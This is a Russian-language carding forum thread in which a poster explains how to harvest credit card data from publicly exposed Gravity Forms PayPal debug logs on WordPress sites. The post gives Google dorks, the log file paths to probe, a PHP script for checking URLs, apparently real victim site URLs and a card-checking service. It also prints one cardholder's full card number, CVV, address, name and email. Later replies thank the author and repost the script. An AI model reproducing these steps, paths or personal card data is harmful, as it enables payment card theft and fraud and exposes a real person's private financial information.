1. Внимание!!! Не заходит на форум? Хотите сохранить доступность к нам на 99.9%? Обязательно запишите все зеркала проекта! Именно по этому мы настоятельно рекомендуем использовать онион домен для TOR-Браузера, там доступность форума будет максимальной. Ссылка для установки и все зеркала в этой темe.

    Зеркало для TOR-Браузера - http://norabizt5qqxefxy.onion

    Чистое зеркало для обычных браузеров - https://nora.holiday

    Скрыть объявление

Поиск картона свои руками

Тема в разделе "КАРДИНГ В НОРЕ", создана пользователем Mr.ROBOT, 27 мар 2017.

  1. Mr.ROBOT
    off

    Mr.ROBOT include(Happy) VIP МАГАЗИНЫ

    Сообщения:
    125
    Пол:
    Мужской
    Репутация:
    65
    Сфера:
    Хакинг
    Поиск картона свои руками

    Привет ребятишки! И снова с вами MrROBOT! Сегодня я покажу как можно добывать картон, метод абсолютно уникальный и неоткуда не слизанный. Дырочку я нашел довольно давно, но сегодня появилась нужна в СС и пришлось немного помозговать, чтобы запустить данный процесс. Я нашел небольшую ошибку в плагине WP под название gravity forms, данный скрипт многофункциональный. Это 0day который нигде не фигурировал на данный момент, другие баги конечно же в нем находили. Данный плагин использую для подключения оплаты на сайте и других фишек, подробнее можно почитать тут https://wordpress.org/plugins/gravity-forms-addons/
    Как видим активных инсталлов +6000, что довольно не плохо. Дело в том, что в режиме дебага ведется лог где лежат картонки и другая информация холдера.

    Пример записи:

    Что мы тут видим?

    1) ACCT=5410658406967503 - номер карты
    2) EXPDATE=1217 - дата
    3) CVV2=572 - без комментов
    4) STREET=681 B West Broadway&CITY=Granville&STATE=OH&ZIP=43023&BILLTOCOUNTRY=US&CURRENCY=USD - полный адрес холдера
    5) FIRSTNAME=Nestor &LASTNAME=Matthews - ФИО холдера
    6) EMAIL=matthewsn@denison.edu - почту + в некоторых случая пасс от PayPal :)

    Нам же этого хватит? :)

    Поиск уязвимого скрипта:

    Код:
    inurl:/wp-content/uploads/gravity_forms/logs/
    
    Тут мы сразу находит:

    http://www.nofas.org/wp-content/uploads/gravity_forms/logs/gravityformspaypalpaymentspro.txt
    http://www.blackbeltsuccess.com/sla.../gravity_forms/logs/gravityformspaypalpro.txt

    Как видим в файликах gravityformspaypalpaymentspro.txt и gravityformspaypalpro.txt лежит лог по дебагу и куча картона со всеми необходимыми данными. Можете не стараться, он весь уже чекнутый и отработанный :) Если знакомы с настройками веб сервера, то поймете как такие вещи попали в Гугл. Тут не правильно настроены права доступа, именно по этому делаем вывод, что таких сайтов в 1000 раз больше и не все они проиндексировались Гугл.

    Как же нам их найти?

    1) Для начала нам нужно настроить парсер Гугла и выбрать все сайты WP по определенным запросам. Я приведу пару примеров, но свой список палить не буду.

    Код:
    store paypal inurl:/wp-content/
    paypal inurl:/wp-content/
    payment paypal inurl:/wp-content/
    
    и т.д
    
    2) Далее нам нужно будет собрать огромный список и чекнуть его на наличии дебаг лога. Наш скрипт должен ходить и проверять следующие вещи:

    Код:
    /wp-content/uploads/gravity_forms/logs/gravityformspaypalpro.txt
    /wp-content/uploads/gravity_forms/logs/gravityformspaypalpaymentspro.txt
    /wp-content/uploads/gravity_forms/logs/
    
    3) После добычи массово чекаем картон на http://undef.su

    Как это реализовать?

    1) С парсером все просто, как оказалось есть бесплатный http://ascent.pro/ru/. Для его нормальной работы достаточно подключить антигейт или соксы.

    У меня на дедике работает отлично!

    ParserGoogle.jpg
    2) После того как мы выбираем большое количество сайтов WP (предположительно с установленным плагином), нам нужно проверить наличия дебаг лога.

    Для этого можно доработать скрип, все за вас писать не буду. По данной аналогие можно искать ЦЦ не только в этом плагине, но и много где еще!

    Код:
    
    function check_url($url)
    {
    
      $url = preg_replace("/[^x20-xFF]/","",@strval($url));
      if (!strstr($url,"://"))
      {
      $url="http://".$url;
      }
      if (preg_match("/^(http://|https://)((www.|([w, -]+.))?([w, -]+.)(com|net|org|info|biz|spb.ru|msk.ru|com.ru|org.  ru|net.ru|ru|su|us|bz|kz|ws|рф|pro))(|/.*)$/u", $url))
      {
      return $url;
      }
      return false;
    }
    
    function open_url($url)
    {
    $url_c=parse_url($url);
      if (!empty($url_c['host']) and checkdnsrr($url_c['host']))
      {
      // Ответ сервера
      if ($otvet=@get_headers($url)){
      return substr($otvet[0], 9, 3);
      }
      }
      return false;  
    }
    
    // Проверка ссылкок! Тут настраиваем забор в цикле из тхт или формы
    $url='http://site.ru/wp-content/uploads/gravity_forms/logs/gravityformspaypalpaymentspro.txt';
    if ($url=check_url($url))
    {
      // ссылка корректная
      if ($o=open_url($url))
      {
      echo "Ответ сервера " . $o;
      }
      else
      {
      echo "Сервер не отвечает";
      }
    }
    else echo "Некорректная ссылка";
    
    Я думаю логика поиска вам станет понята. Зачем платить за картон? Кода его можно найти! :) Это авторская статья от MrROBOT'a для проекта NORA.BIZ, если берете ставьте копирайты. Удачи ребятишки!
     
  2. root
    off

    root NOSAM Команда форума

    Сообщения:
    405
    Пол:
    Мужской
    Репутация:
    150
    Сфера:
    Безопасность
    Депозит:
    999 999 999
    Дорогой, жду тебя чаще у нас. Спасибо за материал.
     
  3. xPromo
    off

    xPromo 2+2=ботва УЧАСТНИКИ

    Сообщения:
    125
    Пол:
    Мужской
    Адрес:
    Yamayka
    Репутация:
    22
    Сфера:
    Вирусология
    Спасибо за тему, есть пару мыслей по этому поводу. Только parser у меня вылетает и ошибкой постоянно( есть такие глюки у кого?
     
  4. Ezichij
    off

    Ezichij Зародыш УЧАСТНИКИ

    Сообщения:
    18
    Пол:
    Мужской
    Адрес:
    ru
    Репутация:
    0
    Сфера:
    Кардинг
    друг смотри я настроил парсер гугла по запросам что ты дал в пример(
    store paypal inurl:/wp-content/
    paypal inurl:/wp-content/
    payment paypal inurl:/wp-content/) пропарсил, собрал список . и как ( даже чем) проверить этот список на наличее дебаг лога. Извени если возможно мой вопрос покажется нубским, для меня это пока дебри вот и пытаюсь по таким темам разобраться/научится благо вы их выкидываете) еще бы немного подсказочек, просто не которые этапы ставят в ступор.
     
  5. Ljuser
    off

    Ljuser Пока одупляюсь БЕЗ ПРОБЕГА

    Сообщения:
    1
    Пол:
    Мужской
    Адрес:
    Kazan
    Репутация:
    0
    Сфера:
    Кардинг
    Норм тема.
     
  6. ARMANI
    off

    ARMANI GUM УЧАСТНИКИ

    Сообщения:
    83
    Пол:
    Мужской
    Адрес:
    MOSCOW
    Репутация:
    7
    Сфера:
    Кардинг
    Avtoru thx!
    Kak sobral spisok, videraem iz nego domanis i proveryaem nalichie etogo loga.
    Script chem proverit tam est. Mogno denver postavit www.denwer.ru


    function check_url($url)
    {

    $url = preg_replace("/[^x20-xFF]/","",@strval($url));
    if (!strstr($url,"://"))
    {
    $url="http://".$url;
    }
    if (preg_match("/^(http://|https://)((www.|([w, -]+.))?([w, -]+.)(com|net|org|info|biz|spb.ru|msk.ru|com.ru|org. ru|net.ru|ru|su|us|bz|kz|ws|рф|pro))(|/.*)$/u", $url))
    {
    return $url;
    }
    return false;
    }

    function open_url($url)
    {
    $url_c=parse_url($url);
    if (!empty($url_c['host']) and checkdnsrr($url_c['host']))
    {
    // Ответ сервера
    if ($otvet=@get_headers($url)){
    return substr($otvet[0], 9, 3);
    }
    }
    return false;
    }

    // Проверка ссылкок! Тут настраиваем забор в цикле из тхт или формы
    $url='http://site.ru/wp-content/uploads/gravity_forms/logs/gravityformspaypalpaymentspro.txt';
    if ($url=check_url($url))
    {
    // ссылка корректная
    if ($o=open_url($url))
    {
    echo "Ответ сервера " . $o;
    }
    else
    {
    echo "Сервер не отвечает";
    }
    }
    else echo "Некорректная ссылка";

     
  7. LUKAGREEN
    off

    LUKAGREEN Пока одупляюсь БЕЗ ПРОБЕГА

    Сообщения:
    2
    Пол:
    Мужской
    Адрес:
    итернет
    Репутация:
    0
    Сфера:
    Другое
  8. vipgold
    off

    vipgold Проверен в Норе УЧАСТНИКИ

    Сообщения:
    103
    Пол:
    Мужской
    Адрес:
    spb
    Репутация:
    9
    Сфера:
    Кардинг
    Если в программирование не понимаешь используй парсер для win http://ascent.pro/ru/
     
  9. Chapski
    off

    Chapski Пока одупляюсь БЕЗ ПРОБЕГА

    Сообщения:
    4
    Пол:
    Мужской
    Адрес:
    Chapchapski
    Репутация:
    0
    Сфера:
    Кодинг
    Отличная идея, нужно похожие cms проверить